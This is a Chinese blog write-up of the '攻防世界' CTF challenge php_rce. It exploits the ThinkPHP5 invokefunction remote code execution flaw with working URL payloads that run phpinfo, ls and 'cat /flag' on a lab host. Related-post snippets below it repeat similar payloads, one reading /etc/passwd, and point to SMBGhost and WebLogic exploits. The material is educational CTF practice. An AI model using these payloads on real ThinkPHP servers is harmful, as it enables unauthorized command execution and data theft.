攻防世界-Web-php_rce

最新推荐文章于 2024-07-17 08:38:18 发布
最新推荐文章于 2024-07-17 08:38:18 发布
阅读量598 收藏 2
点赞数
分类专栏: WriteUp 文章标签: 安全 thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/107826256
版权

0x01

打开题目,很明显是ThinkPHP5框架,这里就联想到ThinkPHP5的著名漏洞,再加上题目中的RCE(远程代码执行)解题思路基本就有了。

关于ThinkPHP5的这个漏洞,可以参考:ThinkPHP5 RCE漏洞重现及分析

0x02

使用payload验证一下漏洞:
/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
在这里插入图片描述接下来需要修改URL中红圈内的两个参数来控制代码的执行

0x03

首先使用system函数来执行系统命令ls列出本目录下的文件,payload如图
在这里插入图片描述
本目录没有发现可以文件,尝试其他目录,比如上级目录,home目录,最后在根目录下找到了falg文件
在这里插入图片描述

0x04

构造payload,读取flag文件:
http://220.249.52.133:34398/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
在这里插入图片描述

uh3ng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web---php_rce
gongjingege的博客
07-09 493
php_rce 没有题目描述,直接打开链接 看到这一脸懵,试了几种常用的方法,什么也没发现,于是从内容入手,百度一下thinkphp 5.0版本,发现这个版本存在远程执行命令的漏洞,对漏洞这方面不了解,网上查找一下这个版本的漏洞 漏洞链接 找到了payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 没有发现flag,于是
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
攻防世界php_rce
weixin_52268949的博客
01-20 892
php_rce 进入题目提示为ThinkPHP V5 遇到这种题我们一般去找一下框架的rce漏洞即可,搜索到这样一篇文章 https://www.freebuf.com/articles/web/289860.html 然后我们直接使用这里面的payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 成功rce 接下来就是找fl
攻防世界WEB(新手模式)2-PHP2
最新发布
你好
07-17 152
因此我们知道这题的要求是对admiin进行URL编码,因为$_GET本身自带一次urldecode,题目本身又进行了一次urldecode,所以要对id赋的值admin进行两次url编码。就很莫名其妙有没有,然后我检查源代码和f12都没什么信息,回头看题目,他的名字是PHP2,那么就很容易联想到php嘛,先进phps。直接在URL输入/index.phps就可以直接发现源代码,接下来进行代码审计。这里我用的是burp自带的编码工具进行两次编码。然后在URL中加上就ok了。还去百度翻译翻译了一下。
攻防世界——php_rce
qq_60905276的博客
11-11 1740
我看不懂,查一下资料发现ThinkPHP V5曾经出现一个漏洞,来学习一下。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 看得出来程序没经过控制器进行过滤,所以可以用/来控制程序。 搞不懂这个漏洞是怎么搞出来的,借用一下大神的答案。 ?
攻防世界php-rce
evil_ming的博客
05-14 181
百度一下thinkphp,找到几个get传参的webshell漏洞,直接cv过来一个个试 s=index/think\App/invokeFunction&fun ction=call_user_func_array&vars[0]=sys tem&vars[1][]=命令 先试试dir来查看包含的文件 没有看见我们喜闻乐见的flag.txt,又不想一个个file的找,那就现学现卖一个新命令直接去找flag文件 s=index/think\App/inv...
PHP_RCE
The code way of kinnisoy
03-22 4204
常用函数: system(); scandir(); fopen("",""); url代码执行payload /?url= $g=scandir(%22../../../%22)[7]; $f=fopen(%22../../../$g%22,%22r%22); while(!feof($f)) { echo%20 fgetc($f); }// %20 %22 "
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,...cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 "cat /etc/passwd" 漏洞信息 接触
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
"fastjson-rce-exploit"正是针对Fastjson中的一个严重安全漏洞——远程代码执行(RCE)的利用方法。这个漏洞的存在,使得攻击者有可能通过精心构造的JSON输入,执行任意的远程代码,对目标系统造成严重的危害。 ...
攻防世界 | php_rce
weixin_47982238的博客
10-19 285
进入网页后是这样的,现根据题目rce了解了主要是远程命令代码执行漏洞,就去GitHub上搜索了一下think PHPV5 不成想真被我搜到了,如下图: 点击进去之后,发现了许多远程代码执行漏洞 不妨先来一个试试: http://220.249.52.133:41485/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]..
php_rce
qq_44111753的博客
11-14 264
WP 攻防世界 php_rce 题目: WP: 各种办法没有收获,上网搜索后发现原来是有个ThinkPHP V5漏洞,并且在github上就已经提交过 找到相应版本的payload: ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 改变payload查看当前目录下的文件 emmm…无重要信息,接着查看上一级目录: 继续查看上一级目录…
攻防世界web新手关之php_rce
weixin_45746283的博客
11-16 643
攻防世界web新手关之php_rce
攻防世界web进阶区--php_rce write up
m0_62851980的博客
04-14 3699
打开靶机: 这道题没有什么难点,重点在于RCE的认识和thinkphp的漏洞。 那RCE是什么嘞: RCE:远程代码执行漏洞 远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。 漏洞产生的根本原因 服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 也就是说,如果thinkphp真的存在rce,我们就能通过各种指令来获取他的一些信息,包括flag的获
攻防世界 php_rce
qq_53030229的博客
11-03 1920
ThinkPHP V5.0漏洞利用一、ThinkPHP V5.0漏洞1、审查源码2、ThinkPHP V5.0漏洞利用 笔记:作为新手,感觉这些题目真的不友好,看得懂方法,不知道原理,好好学吧!(# ̄~ ̄#) 一、ThinkPHP V5.0漏洞 1、审查源码 首先,我的思路是检查源码和抓包,但是都没有收获 2、ThinkPHP V5.0漏洞利用 1、在没有任何思路的情况下,我把ThinkPHP V5.0粘贴到网页上查看,找到了ThinkPHP V5.0漏洞利用 http://111.200.241.244
攻防世界web进阶_php_rce
chy082的博客
08-21 324
上网查一下ThinkPHP v5,发现有rce漏洞 找到网上的payload: /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 看看上级目录 http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&v
攻防世界web高手进阶区 php_rce
weixin_61835841的博客
04-21 1749
工具 火狐 1.打开链接,观察到这是一个Think PHP V5 框架 2.尝试输入index.php,发现页面没有变化,继续输入下一级文件(随便输入),发现爆出了版本5.0.20 3.查询相关版本的漏洞(百度或者github)都可以试试 、 查询到的payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 放进去尝试发现可
攻防世界-php_rce(远程执行漏洞)
m0_62094846的博客
12-21 1387
打开可以看到一个比较真实的网站,也有超链接可以连接到其他的网站 看到ThinkPHP就可以想到远程执行漏洞(看wp) 语句: index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 index.php?s=index/\think\app/invokefunction&function=call_use...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值